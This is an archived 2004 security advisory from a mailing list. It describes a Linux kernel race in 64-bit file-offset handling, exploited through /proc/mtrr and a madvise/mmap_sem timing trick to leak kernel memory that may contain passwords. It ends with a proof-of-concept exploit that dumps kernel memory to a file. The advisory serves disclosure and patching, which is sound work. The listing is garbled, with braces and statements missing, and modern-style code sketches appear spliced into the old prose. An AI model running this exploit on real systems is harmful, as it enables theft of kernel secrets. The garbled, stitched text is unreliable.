[UNIX] Linux Kernel File Offset Pointer Handling

From: SecuriTeam (support_at_securiteam.com)
Date: 08/10/04

  • Next message: SecuriTeam: "[NT] Vulnerability in Exchange Server 5.5 Outlook Web Access Allows CSS and Spoofing Attacks (MS04-026)"
    To: list@securiteam.com
    Date: 10 Aug 2004 19:05:03 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Linux Kernel File Offset Pointer Handling


    The Linux kernel offers a file handling API to userland applications.
    Basically, a file can be identified by a file name and opened through the
    open(2) system call, which in turn returns a file descriptor for the kernel
    file object. A critical security vulnerability has been found in the Linux
    kernel code handling 64-bit file offset pointers.


    One of the properties of the file object is the 'file offset' (the f_pos
    member variable of the file object), which is advanced whenever one reads
    from or writes to the file. It can also be changed through the lseek(2)
    system call and identifies the current reading/writing position inside
    the file image on the media.

    There are two different versions of the file handling API inside recent
    Linux kernels: the old 32-bit API and the new (LFS) 64-bit API. We have
    identified numerous places where invalid conversions from 64-bit file
    offsets to 32-bit ones, as well as insecure accesses to the file offset
    member variable, take place.
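
    The conversion problem can be illustrated in userland. The following is
    only a sketch under stated assumptions: the helper names are hypothetical
    and do not appear in the kernel source, and the unchecked variant relies
    on the usual two's-complement behaviour of mainstream compilers.

```c
#include <stdint.h>

/* Hypothetical helper: narrow a 64-bit file offset to 32 bits the way an
 * unchecked assignment to a 32-bit variable typically behaves. Only the
 * low 32 bits survive, so large offsets alias small ones. */
static int32_t narrow_offset_unchecked(int64_t off64)
{
    return (int32_t)(uint32_t)off64;
}

/* Hypothetical checked variant: returns 0 and stores the narrowed value
 * on success, or -1 if the offset does not fit into 32 bits. */
static int narrow_offset_checked(int64_t off64, int32_t *out)
{
    if (off64 < INT32_MIN || off64 > INT32_MAX)
        return -1;
    *out = (int32_t)off64;
    return 0;
}
```

    With the unchecked helper an offset of 0x100000010 silently becomes 0x10,
    while the checked helper rejects it.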

    We have found that most of the /proc entries (like /proc/version) leak
    about one page of uninitialized kernel memory and can be exploited to
    obtain sensitive data.

    We have found dozens of places with suspicious or bogus code. One of them
    resides in the MTRR handling code for the i386 architecture:

    static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                             loff_t *ppos)
    {
    [1] if (*ppos >= ascii_buf_bytes) return 0;
    [2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
        if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
    [3] *ppos += len;
        return len;
    } /* End Function mtrr_read */

    It is quite easy to see that, since copy_to_user can sleep, the second
    reference to *ppos may see a different value than the first. In other
    words, code operating on the file->f_pos variable through a pointer must
    be atomic with respect to the current thread. We expect even more trouble
    in the SMP case.
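
    One common way to avoid the second fetch is to read the offset once into
    a local variable and to work only on that copy. The sketch below is a
    userland model and not the kernel code: memcpy() stands in for
    copy_to_user(), src and src_len stand in for ascii_buffer and
    ascii_buf_bytes, and the function name is hypothetical. It removes the
    double fetch but does not by itself serialize concurrent users of f_pos.

```c
#include <string.h>
#include <sys/types.h>

/* Userland model of a read handler that snapshots the shared offset. */
static ssize_t read_with_snapshot(const char *src, size_t src_len,
                                  char *dst, size_t len, long long *ppos)
{
    long long pos = *ppos;             /* fetch the shared offset exactly once */

    if (pos < 0 || (unsigned long long)pos >= src_len)
        return 0;                      /* reject negative or past-the-end offsets */
    if (len > src_len - (size_t)pos)
        len = src_len - (size_t)pos;   /* clamp without computing pos + len */

    memcpy(dst, src + pos, len);       /* stands in for copy_to_user() */

    *ppos = pos + (long long)len;      /* publish the result from the local copy */
    return (ssize_t)len;
}
```

    Because every check and the final update use the same local value, a
    change of *ppos made by another thread during the copy cannot invalidate
    the bounds that were already verified.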

    In the following we concentrate on the mtrr.c code; however, we think
    that other f_pos handling code in the kernel may be exploitable as well.

    The idea is to use the blocking property of copy_to_user to advance the
    file->f_pos file offset to a negative value, allowing us to bypass the
    two checks marked with [1] and [2] in the above code.

    There are two situations in which copy_to_user() will sleep if there is no
    page table entry for the corresponding location in the user buffer used to
    receive the data:

     - The underlying buffer maps a file which is not in the kernel page cache
    yet. The file content must be read from the disk first.

     - The mmap_sem semaphore of the process's VM is in a closed state, that
    is, another thread sharing the same VM caused a down_write on the
    semaphore.

    We use the second method as follows. One of two threads sharing the same
    VM issues a madvise(2) call on a VMA that maps a sufficiently big file,
    setting the madvise flag to WILLNEED. This will issue a down_write on the
    mmap semaphore and schedule a read-ahead request for the mmaped file.

    Meanwhile the second thread issues a read on the /proc/mtrr file and thus
    goes to sleep until the first thread returns from the madvise system
    call. The two threads will be woken up in FIFO order, so the first
    thread runs first and can advance the file pointer of the proc file
    to the maximum possible value of 0x7fffffffffffffff while the second
    thread is still waiting in the scheduler queue for the CPU (in the
    non-SMP case).

    After the place marked with [3] has been executed, the file position will
    have a negative value and the checks [1] and [2] can be passed for any
    buffer length supplied, thus leaking the kernel memory from the address of
    ascii_buffer on to the user space.
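
    The arithmetic behind this step can be modelled in userland. The sketch
    below makes several assumptions: the function names are hypothetical,
    buf_bytes stands in for ascii_buf_bytes and is assumed to be a 32-bit
    unsigned count, and the wrap-around is computed in unsigned arithmetic
    because signed overflow is undefined in C.

```c
#include <stddef.h>
#include <stdint.h>

/* Model of step [3], "*ppos += len". The addition is done on unsigned
 * values so the wrap is well defined; the cast back to a signed type is
 * implementation-defined but yields the two's-complement value on
 * mainstream compilers. */
static int64_t advance_offset(int64_t pos, size_t len)
{
    return (int64_t)((uint64_t)pos + (uint64_t)len);
}

/* Model of checks [1] and [2]: returns how many bytes the handler would
 * agree to copy for a given offset and requested length. */
static size_t bytes_allowed(int64_t pos, size_t len, unsigned int buf_bytes)
{
    if (pos >= (int64_t)buf_bytes)                /* [1] */
        return 0;
    if (pos + (int64_t)len > (int64_t)buf_bytes)  /* [2] */
        len = (size_t)((int64_t)buf_bytes - pos);
    return len;
}
```

    Starting from 0x7fffffffffffffff, advancing by one page gives a negative
    offset, and for a negative offset neither check limits the requested
    length.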

    We have attached proof-of-concept exploit code to read portions of
    kernel memory. Another exploit at our disposal can use other
    /proc entries (like /proc/version) to read one page of kernel memory.

    Since no special privileges are required to open the /proc/mtrr file for
    reading, any process may exploit the bug to read huge parts of kernel
    memory.

    The kernel memory dump may include very sensitive information like hashed
    passwords from /etc/shadow or even the root password.

    We have found in an experiment that after the root user logged in using
    ssh (in our case it was OpenSSH using PAM), the root password was kept in
    kernel memory. This is very surprising since sshd will quickly clean
    (overwrite with zeros) the memory portion used to store the password. But
    the password may have made its way through various kernel paths like pipes
    or sockets.
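
    For illustration, overwriting a secret with zeros in userland is often
    done along the following lines. This is only a sketch with a hypothetical
    helper name and is not taken from sshd; it clears the process's own
    buffer only and cannot reach copies the kernel may still hold in pipe or
    socket buffers.

```c
#include <stddef.h>

/* Hypothetical helper: overwrite a secret with zeros through a volatile
 * pointer so the compiler cannot discard the stores as dead code. */
static void wipe_secret(void *buf, size_t len)
{
    volatile unsigned char *p = (volatile unsigned char *)buf;

    while (len--)
        *p++ = 0;
}
```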

    Tested and known to be vulnerable kernel versions are all <= 2.4.26 and <=
    2.6.7. All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released. There is no hotfix for this
    vulnerability.

    Proof of Concept:

    /*
     * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     */

    #define _GNU_SOURCE

    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/socket.h>
    #include <sys/select.h>
    #include <sys/time.h>
    #include <sys/mman.h>

    #include <linux/unistd.h>

    #include <asm/page.h>

    // define machine mem size in MB
    #define MEMSIZE 64

    _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
       uint, wh);

    void fatal(const char *msg)
     if(!errno) {
      fprintf(stderr, "FATAL ERROR: %s\n", msg);
     else {


    static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
               size=PAGE_SIZE, us;
    static volatile int go[2];
    static loff_t off;
    static char *buf=NULL, *file, child_stack[PAGE_SIZE];
    static struct timeval tv1, tv2;
    static struct stat st;

    // child closes semaphore & sleeps
    int start_child(void *arg)
    // unlock parent & close semaphore
     madvise(file, csize, MADV_DONTNEED);
     madvise(file, csize, MADV_SEQUENTIAL);
     gettimeofday(&tv1, NULL);
     read(pfd, buf, 0);

     r = madvise(file, csize, MADV_WILLNEED);

    // parent blocked on mmap_sem? GOOD!
     if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
      r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
       if( r == -1 )
      printf("\n[+] Race won!"); fflush(stdout);
     } else {
      printf("\n[-] Race lost %d, use another file!\n", go[1]);
      kill(getppid(), SIGTERM);

    return 0;

    void usage(char *name)
     printf("\nUSAGE: %s <file not in cache>", name);

    int main(int ac, char **av)

    // mmap big file not in cache
     r=stat(av[1], &st);
      fatal("stat file");
     csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

     fd=open(av[1], O_RDONLY);
      fatal("open file");
     file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
     printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);

     pfd=open("/proc/mtrr", O_RDONLY);

     fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
      fatal("open data");

     r=ftruncate(fd, fsize);

     buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
     printf("\n[+] mmaped kernel data file at %p", buf);

    // clone thread wait for child sleep
     nc = nice(0);
     cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
     while(go[0]==0) {

    // try to read & sleep & move fpos to be negative
     gettimeofday(&tv1, NULL);
     go[1] = 1;
     r = read(pfd, buf, size );
     go[1] = 2;
     gettimeofday(&tv2, NULL);
     while(go[0]!=2) {

     us = tv2.tv_sec - tv1.tv_sec;
     us *= 1000000;
     us += (tv2.tv_usec - tv1.tv_usec) ;

     printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
     r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
     if(r < 0 ) {
      printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
      for(;;) {
       r = read(pfd, buf, PAGE_SIZE );
       buf += PAGE_SIZE;
       printf("\r PAGE %6d", i); fflush(stdout);
      printf("\n[+] done, err=%s", strerror(errno) );

     kill(cpid, 9);

    return 0;


    The information has been provided by <mailto:ihaquer@isec.pl> Paul
    The original article can be found at:


